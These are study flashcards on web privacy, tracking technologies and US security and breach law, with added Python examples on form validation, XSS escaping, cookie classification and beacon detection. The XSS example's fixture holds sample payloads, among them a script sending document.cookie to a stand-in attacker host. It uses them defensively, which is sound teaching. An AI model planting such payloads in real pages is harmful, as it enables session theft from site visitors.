Are an important category of proxy server, widely used in the United States for employee web access, but not nearly as widely used by consumers. VPNs encrypt the information from the user to the organization’s proxy server, thus masking from the ISP both the content and web destinations of that user

126
Q

Caching

A

Occurs when web browsers and proxy servers save a local copy of the downloaded content, reducing the need to download the same content again from the web server. To protect privacy, pages that display personal information should be set to prohibit caching

127
Q

Web server log

A

Sometimes automatically created when a visitor requests a web page. Ex./ of the information automatically logged include the IP address of the visitor, the date and time of the web page request, the URL of the requested file, the URL visited immediately prior to the web page request, and the visitor’s web browser type and computer operating system

128
Q

The Internet protocol (IP)

A

Specifies the format of data packets that travel over the Internet and also provides the appropriate addressing protocol. An IP address is a unique number assigned to each connected device—it is similar to a phone number because the IP address shows where data should be sent from the website

129
Q

Internet service provider (ISP)

A

Often assigns a new IP address on a session-by-session basis. When the IP address used by an individual thus shifts with each session, this approach is referred to as a “dynamic” IP address. Conversely, “static” IP addresses have become more common in recent years. A static IP address remains the same over time for a particular device. In such cases, a website can use the static IP address as a way to recognize a device that returns to the site

130
Q

Transmission control protocol (TCP)

A

Enables two devices to establish a stream-oriented reliable data connection. A combination of TCP and IP is used to send data over the Internet. Data is sent in the form of packets, which contain message content and a header that specifies the destination of the packet.

131
Q

Transport layer security (TLS)

A protocol that ensures privacy between a _____ and a ______

A
  • A protocol that ensures privacy between a user and a web server.
  • When a server and client communicate, TLS secures the connection to ensure that no 3rd party can eavesdrop on or corrupt the message
  • TLS is a successor to secure sockets layer (SSL)
132
Q

JavaScript

A

A scripting language used to produce a more interactive and dynamic website. JavaScript has vulnerabilities and problems interacting with some programs and systems. A common malicious practice is cross-site scripting (XSS). Simple additions to code, such as an infinite loop, can exhaust memory and cause a denial of service. Information security professionals should examine the risks that can arise from the use of JavaScript

133
Q

Cascading style sheets (CSS)

A

The language used to describe the presentation of web pages. This includes colors, layout and font. This language allows for adaptation of the web page to different types of devices. CSS and HTML are independent of each other

134
Q

Flash

A

A bandwidth-friendly interactive animation and video technology that has been widely used to enliven web pages and advertisements. Compatibility and security problems, however, have led to a decrease in use. Some security experts now discourage users from installing Flash. As HTML5 becomes more widely adopted, and as the mobile computing environment grows, use of external plug-ins such as Flash may diminish. As of the writing of this book, Flash is used in less than 10 percent of websites

135
Q

Phishing

A

Emails or other communications that are designed to trick a user into believing that he or she should provide a password, account number or other information. The user then typically provides that information to a website controlled by the attacker.

Ex./ These emails or websites appear to originate from legitimate organizations—such as recognized banks or retailers—and may include seemingly legitimate trademarks, colors, logos or other corporate signatures

136
Q

Spear phishing

A

A phishing attack that is tailored to the individual user, for example, when an email appears to be from the user’s boss instructing the user to provide information

Ex./ the message may appear to come from the recipient’s coworker, or from someone who has recently been in a meeting with the recipient.

137
Q

Social engineering

A

A general term for how attackers can try to persuade a user to provide information or create some other sort of security vulnerability. The social engineer is intent on gaining access to private information and targets an individual or group within an organization that may have such access. Techniques include using an assumed identity in communications, eavesdropping on private conversations or calls, or impersonating an employee or hired worker

138
Q

Examples of technically based attacks

A
  • Structured query language (SQL) injection, cookie poisoning or use of malware. In these attacks, the attacker exploits a technical vulnerability or inserts malicious code.
  • One technical but common threat to online privacy is XSS. XSS is code injected by malicious web users into web pages viewed by other users. Often, the unauthorized content resulting from XSS appears on a web page and looks official, so the users are tricked into thinking the site is legitimate and uncorrupted. XSS is the basis for many convincing phishing attacks and browser exploits.
139
Q

“white hats”

A

security practitioners

140
Q

“black hats”

A

hackers and exploit artists

141
Q

An organization should have a ______ ________ plan and a procedure in place to effectively address information security threats

A

An organization should have a comprehensive defense plan and a procedure in place to effectively address information security threats

142
Q

Transport Layer Security (TLS)

A
  • A standard method for encrypting the transmission of personally identifiable info over the web—including the verification of end user info required for website access
  • Replaced SSL, which is no longer considered secure
  • TLS is widely used for handling transmission of sensitive online data such as passwords or bank account numbers between web computers
143
Q

What are standard practices to protect the privacy of information transmitted over the web?

A
  • Login/password/PINs
  • Software
  • Wireless networks (Wi-Fi)
  • File sharing
144
Q

Spam

A

Unsolicited commercial email

145
Q

What does CAN-SPAM Act require?

A
  • Requires a commercial email to have a clear and conspicuous way for the user to unsubscribe from future emails.
  • Since the enactment of CAN-SPAM in 2003, commercial companies are required to provide an easy way for users to prevent future emails from that company.
  • Enforcement actions under CAN-SPAM have resulted in high fines and even jail sentences, pushing spammers to countries outside the US
146
Q

Whaling

A

A specialized type of spear phishing that is targeted at C-suite executives, celebrities, and politicians. The aim is the same as spear phishing—to use an email or website to obtain personal and/or sensitive information from the victim

147
Q

Malware

A
  • Used to describe malicious software that is designed to disrupt or damage a computer, a network or an electronic device, and provide an attacker unauthorized control over a remote computer
  • As mobile devices become increasingly popular, mobile malware has also become more prevalent
  • Ex./ viruses, worms, spyware, and ransomware.
148
Q

Spyware

A

Software that is downloaded covertly, without the understanding or consent of the end user. Spyware is used to fraudulently collect and use sensitive personal information such as bank account credentials and credit card numbers. Some spyware, for instance, can report each keystroke by a user back to the entity that controls the spyware

149
Q

Ransomware

A

A type of malware with which the malicious actor either (1) locks a user’s operating system, restricting the user’s access to their data and/or device, or (2) encrypts the data so that the user is prevented from accessing his or her files. As the name implies, the victim is then told to pay a ransom to regain access. For victims who choose to pay the ransom, access may or may not be returned.

150
Q

Why was the Children’s Online Privacy Protection Act (COPPA) specifically passed?

A

To protect children’s use of the Internet—particularly websites and services targeted toward children

151
Q

COPPA

A

Requires website operators to provide clear and conspicuous notice of the data collection methods employed by the website, including functioning hyperlinks to the website privacy policy on every web page where personal information is collected. It also requires consent by parents prior to collection of personal information for children under the age of 13.

152
Q

California’s Privacy Rights for California Minors in the Digital World

A
  • Individuals under the age of 18 have the right to request removal of information posted online
  • Statute prohibits online advertising to minors related to products that these consumers are not legally permitted to buy and also restricts certain online advertising practices based on the minors’ personal info
153
Q

Delaware’s Online and Personal Privacy Protection Act

A

Contains similar categories of restrictions related to advertising to minors (as California’s Privacy Rights for California Minors in the Digital World)

154
Q

A comprehensive privacy statement covers

A
  • Effective date
  • Scope of notice
  • Types of personal info collected (both actively and passively)
  • Info uses and disclosures
  • Choices available to the end user
  • Methods for accessing, correcting or modifying personal info or preferences
  • Methods for contacting the organization or registering a dispute
  • Processes for how any policy changes will be communicated to the public
155
Q

The online trust verification service TrustArc recommends that organizations include the following practices when developing a basic website privacy statement:

A
  • Say what the organization does and do what is stated
  • Tailor disclosures to the actual business operations model
  • Do not treat privacy statements as disclaimers
  • Revisit the privacy statement frequently to ensure it reflects current business and data collection practices
  • Communicate these privacy practices to the entire company
156
Q

Trustmarks

A

Trustmarks are images or logos displayed on websites to indicate that a business is a member of a professional organization or has passed security and privacy tests. They are designed to give customers confidence that they can safely engage in e-commerce transactions. TrustArc, Norton and the Better Business Bureau are examples of organizations whose trustmarks are commonly displayed

157
Q

Layered notices

A

Are a response to problems with a single long notice. The basic idea is to offer “layers” that provide the key points on top in a short notice, but give users the option to read a detailed notice or click through to greater detail on particular parts of the notice

158
Q

Short notice

A

The top layer. Often using a standard format, it summarizes the notice scope as well as basic points about the organization’s practices for personal information collection, choice, use and disclosure. Details for contacting the organization on information privacy matters are also included along with links to the full notice.

159
Q

Full notice

A

The bottom layer. Often referenced from the short notice via a hyperlink, it is a comprehensive information disclosure that articulates the organization’s privacy notice in its entirety. The full notice is thus available for end users who are interested. The full notice also guides an organization’s employees on permitted data practices and can be used for accountability by enforcement agencies or the general public

160
Q

Overarching principles to address privacy and security in the mobile environment include. . .

A

Privacy by design (or even privacy by default), transparency, and simplification of consumer choices

161
Q

The APEC framework sets forth exceptions to the access and correction rights, with language similar to that in the Privacy Shield agreement:

A

Such access and opportunity for correction should be provided except where:

(i) the burden or expense of doing so would be unreasonable or disproportionate to the risks to the individual’s privacy in the case in question;
(ii) the information should not be disclosed due to legal or security reasons or to protect confidential commercial information; or
(iii) the information privacy of persons other than the individual would be violated.

162
Q

Webform

A

A portion of a web page that contains blank fields, text boxes, check boxes or other input areas that end users complete by providing data (which may or may not include personal information)

163
Q

One-line text boxes

A
  • Used to capture specific pieces of info such as name, city, credit card number or search terms
  • A label requesting a clear-cut entry is typically present
  • An important privacy consideration is that limitations should be placed on one-line text boxes to ensure they are used only as intended (e.g., a maximum of 14 characters for a first name)
  • Failure to set such limits can result in security vulnerabilities. A limit set only in the browser (such as an HTML maxlength attribute) is a hint that a user can remove; the length cap and the allowed character set must also be enforced on the server, which cannot trust what the browser sends
164
Q

Scrolling text boxes

A

Used to capture a sentence or more of text. These are frequently used when an unspecified answer is desired. For instance, a common use is a request for support. Scrolling text boxes should be used with caution since little control exists over what information a user submits

165
Q

Checkboxes and radio buttons

A

Used to collect answers to structured questions. Check boxes allow multiple answers to be selected out of a list of items, while radio buttons limit the user to one answer. Both options are safer than fields that require the user to type free text, because the expected input is limited to a small set of known values. The selected value is still transmitted to the server, however, and a user (or an attacker scripting the request) can submit any value at all, so the server must still check what it receives against the list of offered options
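The server-side check that the three input types above call for, as an added example (not code from the book or the flashcards): a constructed support form with a one-line text box, a radio group and a checkbox group, validated the way a request handler should treat a parsed form body. The field names, limits and the two submissions are assumptions made for the example. The "tampered" submission shows what the browser-side controls do not prevent: an over-long name, a radio value that was never offered, an edited option list and an extra field.

```python
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional

# Hypothetical support-form definition, constructed for this example. Each field carries the
# server-side limit that the browser-side form control only hints at.
@dataclass(frozen=True)
class FieldSpec:
    kind: str                               # "text" (one-line box), "radio" or "checkbox"
    max_len: int = 0                        # text only: hard length cap
    pattern: Optional[re.Pattern] = None    # text only: allowed characters
    choices: FrozenSet[str] = frozenset()   # radio/checkbox only: the offered options

FORM: Dict[str, FieldSpec] = {
    "first_name": FieldSpec("text", max_len=40,
                            pattern=re.compile(r"[A-Za-z][A-Za-z' -]{0,39}")),
    "contact_pref": FieldSpec("radio", choices=frozenset({"email", "phone"})),
    "topics": FieldSpec("checkbox", choices=frozenset({"billing", "privacy", "support"})),
}

# Submissions as the server sees them after parsing the request body: every value is a
# string, and a field may arrive zero, one or many times regardless of its control type.
HONEST_SUBMISSION = {"first_name": ["O'Brien"], "contact_pref": ["email"],
                     "topics": ["billing", "privacy"]}
TAMPERED_SUBMISSION = {"first_name": ["A" * 41],           # maxlength ignored
                       "contact_pref": ["admin"],          # value not among the radio buttons
                       "topics": ["billing", "<script>"],  # option list edited in the browser
                       "is_staff": ["1"]}                  # field the form never offered

def validate(form: Dict[str, FieldSpec], submission: Dict[str, List[str]]):
    """Return (clean, errors). Nothing in `submission` is trusted: length, character set,
    cardinality and membership in the offered choices are all re-checked here."""
    clean, errors = {}, {}
    for name, spec in form.items():
        values = submission.get(name, [])
        if spec.kind == "text":
            if len(values) != 1:
                errors[name] = "expected exactly one value"
            elif len(values[0]) > spec.max_len:
                errors[name] = f"longer than {spec.max_len} characters"
            elif spec.pattern and not spec.pattern.fullmatch(values[0]):
                errors[name] = "contains characters outside the allowed set"
            else:
                clean[name] = values[0]
        elif spec.kind == "radio":
            if len(values) != 1 or values[0] not in spec.choices:
                errors[name] = "must be exactly one of the offered choices"
            else:
                clean[name] = values[0]
        elif spec.kind == "checkbox":
            bad = sorted(v for v in values if v not in spec.choices)
            if bad:
                errors[name] = f"values not among the offered choices: {bad}"
            else:
                clean[name] = sorted(set(values))   # unchecked boxes simply yield []
    extra = sorted(set(submission) - set(form))
    if extra:
        errors["_unexpected_fields"] = f"fields not in the form: {extra}"
    return clean, errors

if __name__ == "__main__":
    for label, sub in (("honest", HONEST_SUBMISSION), ("tampered", TAMPERED_SUBMISSION)):
        clean, errors = validate(FORM, sub)
        print(label, "->", "accepted" if not errors else "rejected", errors)
```

Rejecting unknown fields matters as much as checking known ones: an extra `is_staff=1` that a framework quietly binds onto a model object is a mass-assignment bug, not a validation detail.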

166
Q

Active data collection

A

Occurs when the end user deliberately provides information to the website through the use of one of the input mechanisms described above

167
Q

Passive data collection

A

Occurs when information is gathered automatically— often without the end user’s knowledge—as the user navigates from page to page on a website

168
Q

Websites and Third-Party Interactions

A

The boundaries between websites are becoming blurred through the emergence of syndicated content, web services, co-branded online ventures, widgets, and online advertising networks

169
Q

Syndicated content

A
  • Not actually created by the host site, but rather is developed by and/or purchased or licensed from outside sources such as news organizations
  • One concern with such content is that it might contain malicious code that is then unwittingly incorporated into the organization’s own website source code.
  • Ex./ cross-site scripting (XSS), in which attackers inject scripts into web pages for malicious purposes, taking advantage of the trust users have for a given site; a third-party feed rendered into the page without escaping is one way such a script can arrive
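How syndicated content turns into XSS, and the two controls that stop it, as an added example (not the book's code): a constructed feed item carries textbook payloads in its title, summary and link. `render_raw` is the unsafe pattern (trust the feed, paste it in); `render_safe` escapes every field as text and allows only http(s) links, since a `javascript:` URL in an `href` runs on click just as a `<script>` tag runs on load. `scan_active_content` is a small checker that walks the rendered fragment and reports anything executable. Hosts and item text are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed feed items. The "malicious" one carries classic demonstration payloads in
# every field a syndicated story normally has; it is not taken from any real feed.
MALICIOUS_ITEM = {
    "title": "Breaking <script>location='https://evil.example/?c='+document.cookie</script>",
    "summary": 'Details <img src=x onerror="alert(1)">',
    "link": "javascript:alert(document.domain)",
}
BENIGN_ITEM = {
    "title": "Q&A: state breach laws compared",
    "summary": "Which states set a 45-day deadline",
    "link": "https://news.example/breach-laws?a=1&b=2",
}

def render_raw(item):
    """The unsafe pattern: trusting the feed and pasting it straight into the page."""
    return (f'<article><h3><a href="{item["link"]}">{item["title"]}</a></h3>'
            f'<p>{item["summary"]}</p></article>')

def safe_url(url):
    """Keep only absolute http(s) links. javascript:, data:, vbscript: and scheme-less
    oddities all collapse to a harmless '#'."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return url.strip()
    return "#"

def _esc(text):
    # quote=True also escapes ' and ", needed because some fields land inside attributes.
    return html.escape(text or "", quote=True)

def render_safe(item):
    """Treat every syndicated field as text, never as markup, and restrict the link."""
    return (f'<article class="syndicated"><h3>'
            f'<a href="{_esc(safe_url(item.get("link", "")))}" rel="noopener noreferrer">'
            f'{_esc(item.get("title"))}</a></h3><p>{_esc(item.get("summary"))}</p></article>')

class ActiveContentScanner(HTMLParser):
    """Walks a rendered fragment and records anything that would execute: script elements,
    on* event-handler attributes, and javascript: URLs in href/src."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.findings.append(f"<{tag} {lname}=...>")
            elif lname in ("href", "src") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag} {lname}=javascript:...>")

def scan_active_content(fragment):
    scanner = ActiveContentScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    print("raw :", scan_active_content(render_raw(MALICIOUS_ITEM)))
    print("safe:", scan_active_content(render_safe(MALICIOUS_ITEM)))
```

Escaping is the right tool when the feed is supposed to deliver text. If the contract genuinely allows markup, the answer is an allowlist sanitizer rather than escaping, with a Content Security Policy as the backstop for whatever the sanitizer misses.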
170
Q

Web services

A
  • Facilitate direct communication between computers
  • They make it possible for organizations to interconnect with their suppliers online, or for users to get content from a site that has contracted with the site the user has selected to visit.
171
Q

Co-branded sites - is information sharing allowed?

A

Online partnerships between two or more content or service providers. Sharing of information between the partners is often allowed on co-branded sites as long as it is disclosed in the privacy notice

172
Q

Web widgets

A

Applications that can be installed on a web page, blog, social profile or other HTML page. Although a widget appears on the page itself, its code is typically served and executed by the third party that provides it. The page owner installs it to deliver new website features or increased functionality; widgets are frequently used as tools or content to make the site more dynamic

173
Q

Online advertising networks

A

Connect online advertisers with web publishers that host advertisements on their sites. The networks enable media buyers to coordinate ad campaigns across sites. Through these targeted campaigns, advertisers can reach broad or focused audiences. Ad networks themselves vary in focus and size.

174
Q

Processors

A

Comes from EU law, where processors act on behalf of, and are subject to, the direction of the controller

175
Q

Business associate

A

Used for hospitals and other entities covered by HIPAA

176
Q

Service provider

A

Used for banks and other financial institutions regulated under The Gramm-Leach-Bliley Act (GLBA)

177
Q

Do third parties become controllers as well?

A

Where other third parties receive data to do their own marketing, or further their other purposes, they become controllers as well.

Ex./ a third party may receive data to conduct a sweepstakes or target marketing to the individuals

  • In many jurisdictions, including the EU, the original controller remains responsible for proper handling by third parties who receive personal information through onward transfer
  • In the US, the FTC considers onward transfer to be the responsibility of the host website—not the third party—and has issued guidance and brought enforcement actions toward this end
  • Onward transfer of EU data by U.S. companies is addressed as part of the Privacy Shield
178
Q

Protection of personal information must be assured—contractually and in practice—in data transfers between an organization’s website and such third parties. Moreover, standard practice in many settings is for consumers to be explicitly notified when . . .

A

Such transfers occur, so that they know (a) their personal information will be in the custody of a third party engaged by the host site and (b) they have the ability to make a choice, typically by opting out, if they desire to prevent the onward transfer

179
Q

Digital advertising

A

Composed of desktop/laptop advertising and mobile advertising. An increasingly large portion of the total digital advertising ecosystem is made up of mobile advertising, and this proportion is projected to continue to grow in the near future.

180
Q

Pop-up ads

A

Advertising messages that appear to the end user in a separate browser window in response to browsing behavior or viewing of a site

181
Q

Adware

A

Software that is installed on a user’s computer, often bundled with freeware (free software), such as online games. It monitors the end user’s online behavior so that additional advertising can be targeted to that person based on his or her specific interests and behaviors. Unless there is clear consent by users to this monitoring, however, such adware may be considered spyware by privacy enforcement agencies

182
Q

Magic cookie

A
  • Term in programming languages for a piece of information shared between cooperating pieces of software
  • Cookies are widely used on the Internet to enable someone other than the user to link a computing device to previous web actions by the same device
  • The standard cookie, or HTTP cookie, is a small piece of text that a web server asks the browser to store on the user’s computer and to send back with later requests to that server
  • Cookies enable a range of functions, including authentication of web visitors, personalization of content and delivery of targeted advertising
183
Q

Electronic Privacy Directive of 2002 with respect to cookies

A

Has taken the position that information stored in cookies is generally personal data, so that the user’s consent is needed before a cookie can be placed on the user’s device (with an exception for cookies strictly necessary to provide a service the user has explicitly requested)

184
Q

Session cookie

A

Stored only while the user is connected to the particular web server—the cookie is deleted when the user closes the web browser

185
Q

Persistent cookie

A

Set to expire at some point in the future, from a few minutes to days or even years from initial delivery. Until expiration, the organization that set the cookie can recognize that it is the same cookie on the same device, and thus often the same user, that earlier visited the website

186
Q

First-party cookie

A

Set and read by the web server hosting the website the user is visiting. For instance, an online retailer or government agency can set a first-party cookie on the hard drive of a user who chooses to visit the retailer’s or agency’s site

187
Q

Third-party cookie

A
  • Set and read by or on behalf of a party other than the web server that is providing a service. (The second party is understood to be the user who is surfing the web.)
  • Online advertising networks set third-party cookies, as do companies that provide analytics of web usage across sites.
  • Some websites enable widgets or other software that appears on the first party’s website but interacts with a third party, which may set a third-party cookie
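The four cookie distinctions on the preceding cards (session vs. persistent, first- vs. third-party) decided from real header syntax, as an added example that is not part of the flashcards: four constructed `Set-Cookie` headers, as a browser viewing a page on a hypothetical `shop.example` might receive them from the site itself and from two embedded third parties, are classified with the standard library's `http.cookies`. `registrable_domain` is an assumption standing in for a Public Suffix List lookup; the fixed clock `NOW` keeps the output reproducible.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers for a page at https://shop.example/ (hypothetical hosts):
# two from the page's own server, two from embedded third parties.
RESPONSES = [
    ("shop.example", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("shop.example", "prefs=theme%3Ddark; Domain=shop.example; Max-Age=31536000; Path=/"),
    ("ads.tracker.example",
     "uid=7f3a9c; Domain=.tracker.example; Expires=Wed, 21 Oct 2026 07:28:00 GMT; "
     "Path=/; Secure; SameSite=None"),
    ("metrics.analytics.example", "_ga=GA1.2.1; Max-Age=63072000; Path=/"),
]
NOW = datetime(2025, 1, 1, tzinfo=timezone.utc)  # fixed clock so the result is reproducible

def registrable_domain(host):
    """Last two labels of the host. Assumption for an offline example: real code must use
    the Public Suffix List, or co.uk-style suffixes will be mis-grouped."""
    return ".".join(host.lower().strip(".").split(".")[-2:])

def classify_cookies(page_host, set_by_host, set_cookie_header, now=NOW):
    """Classify every cookie in one Set-Cookie header as session/persistent and as
    first/third party relative to the page the user is viewing."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    out = []
    for name, m in jar.items():
        # Scope is the Domain attribute if present, else the host that sent the header.
        scope = m["domain"] or set_by_host
        party = ("first" if registrable_domain(scope) == registrable_domain(page_host)
                 else "third")
        # RFC 6265: Max-Age takes precedence over Expires; neither means a session cookie.
        if m["max-age"]:
            expires = now + timedelta(seconds=int(m["max-age"]))
        elif m["expires"]:
            expires = parsedate_to_datetime(m["expires"])
        else:
            expires = None
        out.append({
            "name": name,
            "party": party,
            "lifetime": "session" if expires is None else "persistent",
            "expires": expires,
            "secure": bool(m["secure"]),
            "httponly": bool(m["httponly"]),
            "samesite": m["samesite"] or "(unset)",
        })
    return out

def audit(page_host, responses, now=NOW):
    """Classify every response seen while loading the page; cookies keyed by name."""
    found = {}
    for host, header in responses:
        for c in classify_cookies(page_host, host, header, now):
            found[c["name"]] = c
    return found

if __name__ == "__main__":
    for c in audit("shop.example", RESPONSES).values():
        print(f'{c["name"]:8} {c["party"]}-party {c["lifetime"]:10} '
              f'expires={c["expires"]} secure={c["secure"]} samesite={c["samesite"]}')
```

Note that "third-party" is a property of the page context, not of the cookie: the same `uid` cookie is first-party when the user visits `tracker.example` directly. A persistent, third-party cookie is the signature of cross-site tracking and is what cookie-consent tooling and privacy audits should be flagging.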
188
Q

Flash cookie

A

Are stored and accessed by Adobe Flash, a browser plug-in historically used by many Internet sites (Flash was discontinued at the end of 2020). Because Flash kept these “local shared objects” outside the browser’s own cookie store, clearing browser cookies did not remove them, and they were sometimes used to re-create HTTP cookies the user had deleted. While online, an individual’s Internet browser also collects and stores information from sites visited in the form of cache, or cookies.

189
Q

Web Beacons

A
  • Aka a web bug, pixel tag or clear GIF
  • A web beacon is a clear, one-pixel-by-one-pixel graphic image that is delivered through a web browser or HTML-compliant email client application to an end user’s computer—usually as part of a web page request or in an HTML email message, respectively
  • The web beacon operates as a tag that records an end user’s visit to a particular web page
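A scan for the beacon pattern just described, as an added example (not from the book): a constructed page for a hypothetical `shop.example` checkout mixes ordinary images with a 1x1 remote image that carries an identifier in its query string and a hidden remote image. The finder reports every invisible image, which site it reports to, whether it is first- or third-party, and which parameters the request leaks. The same scan applies to an HTML email body. `registrable_domain` is again an assumption in place of a Public Suffix List lookup.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed markup for https://shop.example/checkout (hypothetical hosts throughout).
PAGE_HTML = """
<html><body>
<img src="/static/logo.png" width="200" height="60" alt="Acme">
<img src="https://pixel.adnet.example/b.gif?uid=7f3a9c&pg=checkout" width="1" height="1" alt="">
<img src="https://m.analytics.example/open?cid=42" style="display: none; border: 0">
<img src="/img/spacer.gif" width="1" height="1">
<img src="https://cdn.shop.example/hero.jpg" width="1200" height="400" alt="Hero">
</body></html>
"""

def registrable_domain(host):
    """Last two labels only; an assumption that stands in for a Public Suffix List lookup."""
    return ".".join(host.lower().strip(".").split(".")[-2:])

class BeaconFinder(HTMLParser):
    """Collects <img> elements the user cannot see (1x1/0x0 or hidden by inline style),
    recording where the request goes and which identifiers it carries."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.beacons = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        parts = urlsplit(src)
        tiny = (a.get("width", "").strip() in ("0", "1")
                and a.get("height", "").strip() in ("0", "1"))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if not (tiny or hidden):
            return
        host = parts.netloc.lower()
        # A relative src (no host) is fetched from the page's own site.
        if not host or registrable_domain(host) == registrable_domain(self.page_host):
            party = "first"
        else:
            party = "third"
        self.beacons.append({
            "src": src,
            "host": host or self.page_host,
            "party": party,
            "why": "1x1" if tiny else "hidden",
            "params": {k: v[0] for k, v in parse_qs(parts.query).items()},
        })

def find_beacons(html_text, page_host):
    finder = BeaconFinder(page_host)
    finder.feed(html_text)
    finder.close()
    return finder.beacons

if __name__ == "__main__":
    for b in find_beacons(PAGE_HTML, "shop.example"):
        print(f'{b["party"]}-party {b["why"]:6} -> {b["host"]} params={b["params"]}')
```

Image scanning catches only the classic form. Modern beacons are just as often a script, a CSS background image or a `navigator.sendBeacon` call, so a complete audit watches the network requests a page makes rather than only its markup.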
190
Q

Digital fingerprinting

A

Can identify a device based on information the browser reveals to the website with each request. When a web page is requested, there is no automatic identification of who is seeking to download the content. The web server, though, typically receives certain information connected to the request (such as the IP address, browser and operating system versions, preferred language and other header values), and maintains logs, which are used for security and system maintenance purposes. Taken together, these values can be distinctive enough to recognize the same device on later visits even when no cookie is present.

191
Q

Search engine privacy

A
  • The use of personal information in connection with search engines is important because of the central role search engines perform in determining how people access information on the Internet.
  • Where search engines use cookies or other tracking techniques, the privacy issues are generally similar to those already discussed for cookies; in addition, the search queries themselves are retained in server logs and can reveal sensitive interests on their own
192
Q

In the desktop/laptop advertising ecosystem, one of the most common ways advertisers are able to track users’ devices and serve targeted advertisements is through the use of ______

A

The use of cookies
- Cookies are used to track the activities of devices as they visit particular web pages, allowing advertisers to build profiles of a device’s online activities; these profiles can then be used to create targeted advertising tailored to the user of that device

193
Q

With regard to marketing to digital consumers, it is important to understand two key components that differentiate the mobile advertising ecosystem from the better known cookie-based desktop/laptop advertising ecosystem:

A

(1) App-based usage and (2) mobile browser settings.
- In a mobile operating system, each individual application is run in a separate, secure sandbox
- Whereas a mobile browser can use cookies to identify a user across different websites and visits, each mobile app has to create its own identifier for a user. This means a single user of three different apps on the same device will appear as three different users

194
Q

Why is mobile device tracking valuable?

A

Importantly, mobile device tracking is valuable because mobile devices are rarely shared among users. Unlike a traditional desktop or laptop, which may be shared among the various members of a family, mobile devices are rarely shared in the United States. Therefore, once the device is identified, by default, so is the device’s user

195
Q

Cross-device tracking

A

A tool an advertising tracking company deploys for combining information about each of a user’s devices to track as close to 100 percent of that individual’s history of Internet activity as possible.

196
Q

The ability of a company to connect a user’s devices via login is sometimes called . . .

A

deterministic tracking, because the identical login provides a basis for determining that it is the same user

197
Q

Information security (IS)

A

The protection of information for the purpose of preventing loss, unauthorized access or misuse

198
Q

Information security requires ongoing assessments of threats and risks to information and of the procedures and controls to preserve the information, consistent with three key attributes:

A
  1. Confidentiality—access to data is limited to authorized parties
  2. Integrity—assurance that the data is authentic and complete
  3. Availability—knowledge that the data is accessible, as needed, by those who are authorized to use it
199
Q

Security controls

A

Are mechanisms put in place to prevent, detect, or correct a security incident.

200
Q

The three types of security controls are:

A
  1. Physical controls—such as locks, security cameras, and fences
  2. Administrative controls—such as incident response procedures and training
  3. Technical controls—such as firewalls, antivirus software, and access logs
201
Q

California, a recognized innovator in consumer protection laws, enacted the first state security breach notification law in 2003 and a year later enacted Assembly Bill 1950 (AB 1950) in order to . . .

A

To “encourage businesses that own or license personal information about Californians to provide reasonable security.” - Specifically, the law requires a business “that owns or licenses personal information about a California resident” to “implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.”

202
Q

In the security portion of California’s law, “personal information” is defined as an individual’s name in combination with any one or more of . . .

A

(1) Social Security number, (2) driver’s license number or California identification card number, (3) financial account number or credit or debit card number “in combination with any required security code, access code or password that would permit access to an individual’s financial account,” (4) medical information, (5) health insurance information, and (6) data collected from automated license plate recognition systems

203
Q

True or False? In 2017 Washington issued new regulations applying to financial services companies that may become the new standard for strictest state law

A

False. New York

204
Q

___ state security law, 201 CMR 17.00, has generally been considered the most prescriptive in the nation

A

Massachusetts state security law, 201 CMR 17.00, has generally been considered the most prescriptive in the nation.

205
Q

Massachusetts, 201 CMR 17.00, law goes beyond breach notification by requiring businesses holding “personal information” (defined as a Massachusetts resident’s name plus a sensitive data element, such as a Social Security number) to . . .

A
  1. Designate an individual who is responsible for information security
  2. Anticipate risks to personal information and take appropriate steps to mitigate such risks
  3. Develop security program rules
  4. Impose penalties for violations of the program rules
  5. Prevent access to personal information by former employees
  6. Contractually obligate third-party service providers to maintain similar procedures
  7. Restrict physical access to records containing personal information
  8. Monitor the effectiveness of the security program
  9. Review the program at least once a year and whenever business changes could impact security
  10. Document responses to incidents
206
Q

Washington’s HB 1149

A

Permits financial institutions to recover the costs associated with reissuance of credit and debit cards from large processors whose negligence in the handling of credit card data is the proximate cause of the breach.

207
Q

In chronicling data breaches since 2005, the Privacy Rights Clearinghouse lists eight types of incidents:

A
  1. Unintended disclosure—sensitive information posted publicly on a website, mishandled or sent to the wrong party via email, fax or mail
  2. Hacking or malware—electronic entry by an outside party, malware and spyware
  3. Payment card fraud—fraud involving debit and credit cards that is not accomplished via hacking; for example, skimming devices at point-of-service terminals
  4. Insider—someone with legitimate access, such as an employee or contractor, intentionally breaching information
  5. Physical loss—lost, discarded or stolen nonelectronic records such as paper documents;
  6. Portable device—e.g., lost, discarded or stolen laptop, PDA, smartphone, portable memory device, CD, hard drive, data tape
  7. Stationary device—lost, discarded or stolen stationary electronic device such as a computer or server not designed for mobility
  8. Unknown or other
208
Q

Fundamentals of Incident Management for Data Breaches

A

Step 1: determining whether a breach has actually occurred
Step 2: containment and analysis of the incident
Step 3: notify affected parties
Step 4: organizations should implement effective follow-up methods

209
Q

Executive Office of the President’s Office of Management and Budget (OMB) updated requirements for federal agencies preparing for and responding to breaches of personally identifiable information (PII). This detailed, public guidance can be a useful template for organizations that are looking for best practices in the development of a security breach plan. The OMB set forth the following framework for a security breach plan:

A
  • Designate the members who will make up a breach response team
  • Identify applicable privacy compliance documentation
